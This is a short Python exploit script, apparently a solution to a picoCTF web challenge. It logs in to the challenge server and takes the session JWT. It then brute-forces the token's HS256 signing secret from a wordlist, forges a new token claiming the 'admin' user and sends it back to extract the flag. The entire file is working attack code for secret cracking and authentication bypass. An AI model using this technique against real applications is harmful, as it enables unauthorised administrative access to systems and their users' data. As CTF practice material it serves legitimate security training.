import jwt
import requests
import sys
import re
from jwt import decode, exceptions

# Configuration
url = "http://jupiter.challenges.picoctf.org:63090/"

# Parameter check
if len(sys.argv) < 2:
    print("Usage: python script.py wordlist.txt")
    sys.exit(1)

wordlist_path = sys.argv[1]

# Login to get the token
session = requests.Session()
session.post(url, data={"user": "mH4ck3r0n3"})
token = session.cookies.get("jwt")
# Read the wordlist from file

with open(wordlist_path, "r", encoding="latin-1") as f:
    wordlist = [line.strip() for line in f.readlines()]


# Brute-force the key
found_key = None
for key in wordlist:
    try:
        decode(token, key, algorithms=["HS256"])
        found_key = key
        break  # Break only if the key is found
    except exceptions.InvalidSignatureError:
        continue  

# Create a new JWT
payload = {"user": "admin"}
header = {"typ": "JWT", "alg": "HS256"}
new_token = jwt.encode(payload, found_key, algorithm="HS256", headers=header)
#print(f"[+] New JWT: {new_token}")

# Send the new JWT to get the flag with regex
print("\nFLAG: " + re.search(r"picoCTF\{.*?\}", session.get(url, headers={"Cookie": f"jwt={new_token}"}).text).group(0))


